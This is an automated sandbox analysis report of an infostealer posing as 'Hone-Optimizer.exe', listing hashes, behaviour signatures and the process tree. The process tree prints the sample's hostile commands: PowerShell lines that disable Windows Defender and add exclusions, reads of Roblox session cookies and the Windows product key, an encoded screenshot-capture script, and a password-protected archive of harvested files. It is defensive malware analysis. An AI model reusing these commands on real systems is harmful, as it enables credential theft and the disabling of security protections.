Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    15-11-2024 12:57

General

  • Target

    Hone-Optimizer.exe

  • Size

    7.7MB

  • MD5

    baa9792a0bb9c8df5521b14e425dbe09

  • SHA1

    1cf257b5c2ac3c84d468a3a6a3dbc846f7d50d5e

  • SHA256

    07f228e81a538261d88699e099867204dc8fa6ba44590a75bd6c17bf50217b65

  • SHA512

    45e7285cbbddb8ed61d4a39a09f15b032d8e39534139e96fe81f522fd9a644e2461080ff861062a35f3dec517a55bf584683b17dc2381c6f683f09ae06a4a636

  • SSDEEP

    98304:8VeYgI6OshoKyDvuIYc5AhV+gEc4kZvRLoI0EJfNA3z5UTbdk+QqnWv9JTSPhlVX:8AYmOshoKMuIkhVastRL5Di3tKb0SPJX

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 38 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 54 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
    "C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1860
    • C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
      "C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2548
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2000
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1560
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2164
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5884
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3124
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1568
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4712
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:5780
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7F32.tmp\7F33.tmp\7F34.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5240
            • C:\Windows\system32\mode.com
              Mode 130,45
              6⤵
                PID:2316
              • C:\Windows\system32\reg.exe
                reg add HKLM /F
                6⤵
                • Modifies registry key
                PID:4968
              • C:\Windows\system32\reg.exe
                reg add "HKLM\System\CurrentControlSet\Control\CrashControl" /v "DisplayParameters" /t REG_DWORD /d "1" /f
                6⤵
                  PID:2116
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
                  6⤵
                    PID:5520
                  • C:\Windows\system32\reg.exe
                    reg add HKCU\CONSOLE /v VirtualTerminalLevel /t REG_DWORD /d 1 /f
                    6⤵
                    • Modifies registry key
                    PID:1448
                  • C:\Windows\system32\reg.exe
                    reg query "HKCU\Software\Hone" /v "Disclaimer"
                    6⤵
                      PID:2568
                    • C:\Windows\system32\reg.exe
                      reg add "HKCU\Software\Hone" /v "Disclaimer" /f
                      6⤵
                        PID:5856
                      • C:\Windows\system32\curl.exe
                        curl -g -L -# -o "C:\Users\Admin\AppData\Local\Temp\Updater.bat" "https://raw.githubusercontent.com/auraside/HoneCtrl/main/Files/HoneCtrlVer"
                        6⤵
                          PID:5656
                        • C:\Windows\system32\Dism.exe
                          dism /online /enable-feature /featurename:MicrosoftWindowsWMICore /NoRestart
                          6⤵
                          • Drops file in Windows directory
                          PID:1436
                          • C:\Users\Admin\AppData\Local\Temp\D8A7A6D2-DF3F-452B-901C-673329956A5D\dismhost.exe
                            C:\Users\Admin\AppData\Local\Temp\D8A7A6D2-DF3F-452B-901C-673329956A5D\dismhost.exe {94C3EE10-EB5C-4765-A860-8B0F9074F66A}
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in Windows directory
                            PID:2240
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:5632
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      4⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1420
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2336
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic csproduct get uuid
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1764
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2444
                    • C:\Windows\system32\reg.exe
                      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                      4⤵
                        PID:2840
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3528
                      • C:\Windows\system32\reg.exe
                        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                        4⤵
                          PID:5908
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:5956
                        • C:\Windows\System32\Wbem\WMIC.exe
                          wmic path win32_VideoController get name
                          4⤵
                          • Detects videocard installed
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5572
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:5496
                        • C:\Windows\System32\Wbem\WMIC.exe
                          wmic path win32_VideoController get name
                          4⤵
                          • Detects videocard installed
                          PID:5260
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:5888
                        • C:\Windows\system32\tasklist.exe
                          tasklist /FO LIST
                          4⤵
                          • Enumerates processes with tasklist
                          PID:4948
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2100
                        • C:\Windows\system32\tasklist.exe
                          tasklist /FO LIST
                          4⤵
                          • Enumerates processes with tasklist
                          PID:1244
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                        3⤵
                          PID:3688
                          • C:\Windows\system32\reg.exe
                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                            4⤵
                              PID:5564
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                            3⤵
                              PID:6104
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4308
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tqymn3jh\tqymn3jh.cmdline"
                                  5⤵
                                    PID:1152
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES879F.tmp" "c:\Users\Admin\AppData\Local\Temp\tqymn3jh\CSC3AE48323F8D341DEA510E86E61B9E15B.TMP"
                                      6⤵
                                        PID:6016
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                  3⤵
                                    PID:1016
                                    • C:\Windows\system32\attrib.exe
                                      attrib -r C:\Windows\System32\drivers\etc\hosts
                                      4⤵
                                      • Drops file in Drivers directory
                                      • Views/modifies file attributes
                                      PID:2796
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                    3⤵
                                      PID:4692
                                      • C:\Windows\system32\attrib.exe
                                        attrib +r C:\Windows\System32\drivers\etc\hosts
                                        4⤵
                                        • Drops file in Drivers directory
                                        • Views/modifies file attributes
                                        PID:3040
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                      3⤵
                                        PID:5552
                                        • C:\Windows\system32\tasklist.exe
                                          tasklist /FO LIST
                                          4⤵
                                          • Enumerates processes with tasklist
                                          PID:4192
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                        3⤵
                                          PID:5288
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            4⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4748
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                          3⤵
                                            PID:4904
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                              4⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:5828
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI18602\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\szpO1.zip" *"
                                            3⤵
                                              PID:5748
                                              • C:\Users\Admin\AppData\Local\Temp\_MEI18602\rar.exe
                                                C:\Users\Admin\AppData\Local\Temp\_MEI18602\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\szpO1.zip" *
                                                4⤵
                                                • Executes dropped EXE
                                                PID:1756
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                              3⤵
                                                PID:1004
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic os get Caption
                                                  4⤵
                                                    PID:3000
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                  3⤵
                                                    PID:3856
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic computersystem get totalphysicalmemory
                                                      4⤵
                                                        PID:1604
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                      3⤵
                                                        PID:2336
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic csproduct get uuid
                                                          4⤵
                                                            PID:976
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                          3⤵
                                                            PID:1356
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:5424
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                            3⤵
                                                              PID:324
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic path win32_VideoController get name
                                                                4⤵
                                                                • Detects videocard installed
                                                                PID:1964
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                              3⤵
                                                                PID:6124
